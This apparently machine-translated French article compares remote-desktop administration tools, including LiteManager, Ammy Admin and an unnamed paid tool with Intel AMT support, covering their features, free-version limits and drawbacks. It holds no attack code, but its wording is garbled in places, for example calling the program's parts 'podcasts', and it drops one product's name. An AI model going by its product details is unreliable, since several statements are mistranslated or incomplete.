Il pourra désormais effectuer diverses configurations en votre nom: installation et suppression logiciel, nettoyage du registre, affichage des fichiers personnels, etc. Une fenêtre cachée avec votre moniteur apparaîtra devant lui, qu'il peut, en cliquant dessus, agrandir. Je recommande de désactiver tous les effets visuels (Aero, fonds d'écran, etc.), car la vitesse de transfert entre les ordinateurs se détériorera sensiblement. Pour la correspondance, vous pouvez activer le chat, pour le transfert de fichiers, vous pouvez lancer le gestionnaire de fichiers.

Un utilitaire assez pratique et pratique qui se compose de plusieurs podcasts. La première partie est Serveur, nous l'installons immédiatement et l'exécutons sur l'ordinateur de quelqu'un d'autre, la seconde est Viewer, qui nous permet d'être guidés par un autre PC. L'utilitaire nécessite un peu plus de connaissances que les autres programmes. Travailler avec le serveur n'est pas si difficile, vous pouvez définir vous-même l'ID utilisateur, le programme se souvient des données et n'a plus besoin de ressaisir et de confirmer les informations. Version gratuite pour un usage personnel - LiteManager Free.

Outre la limitation à distance, le chat, l'exportation de données et le nettoyage du registre, il existe plusieurs possibilités intéressantes: capture de moniteur, inventaire, effacement à distance. Une utilisation gratuite est disponible pour travailler sur une trentaine d'ordinateurs, il n'y a aucune restriction dans la durée du programme, il y a une fonction de personnalisationID à usage coopératif. Gratuit et pour un usage professionnel.

Il n'y a pratiquement aucun inconvénient, mais certains des inconvénients de la version gratuite sont des capacités réduites lorsque vous travaillez sur plus de trente PC. En général, le programme est assez pratique et efficace pour l'administration et le contrôle à distance.

Administrateur Ammy

Un utilitaire également identique au programme TeamViewer, mais bien plus simple à utiliser. Les principales fonctions sont: Chat, transfert de fichiers, visualiser et guider l'ordinateur distant. La facilité d'utilisation ne nécessite pas de prise de conscience sérieuse, vous pouvez l'utiliser à la fois en LAN et sur le World Wide Web.

Les inconvénients peuvent sembler être un temps de travail limité, il est payé pour les activités commerciales. L'utilitaire présenté est probablement préférable de ne pas être utilisé pour des manipulations sérieuses.

Un des logiciels payants originaux pour la manipulation à distance d'ordinateurs tiers, conçu pour l'administration opérationnelle avec un accent sur la sécurité. L'utilitaire se compose de deux parties: un serveur et un client. La tâche principale du programme est de travailler avec une adresse IP, l'installation est nécessaire. Sans compétences particulières, il sera difficile de comprendre toutes les fonctions, il ne convient donc pas aux utilisateurs débutants.

Comme prévu, le programme fonctionne à grande vitesse grâce au pilote graphique, il n'y a pratiquement pas de retards et de gels. La technique Intel AMT intégrée vous permet d'accéder au BIOS du PC de quelqu'un d'autre et d'effectuer diverses opérations avec lui. Le programme n'a pas de caractéristiques extraordinaires autres que la fiabilité et la sécurité. Les modes de base sont intégrés: chat, exportation de fichiers, contrôle à distance.

Il y a plusieurs inconvénients: l'absence de client mobile et de travailler sans adresse IP, la version gratuite n'est disponible que pendant un mois, les restrictions graphiques désactivent la personnalisation (le moniteur peut s'éteindre), une expérience est requise pour travailler avec l'utilitaire.

Donc, nous pouvons conclure que ce programme doit être utilisé par des utilisateurs expérimentés pour administrer un PC en mode local. Pour travailler sur Internet, vous devrez probablement exécuter un tunnel VPN.

En principe, vous pouvez marquer au moins 5 programmes supplémentaires, mais cela n'a aucun sens: tous fonctions requises exécutez les utilitaires listés ci-dessus. La fonctionnalité de ces programmes n'est pas très différente. Certains sont totalement gratuits, mais ont leurs inconvénients, tandis que d'autres ont plus d'options, mais vous devez payer. Certains ont également une licence pour un an, donc pour une utilisation à long terme, vous devrez débourser pour son renouvellement. Vous devez donc choisir en fonction de votre objectif. Ces programmes sont tout à fait adaptés à un usage non commercial. Vous pouvez même en combiner plusieurs à la fois.


LA CLOCHE

Il y a ceux qui lisent cette actualité avant vous.
Abonnez-vous pour recevoir les derniers articles.
Email
Nom
Nom de famille
Comment voulez-vous lire The Bell
Pas de spam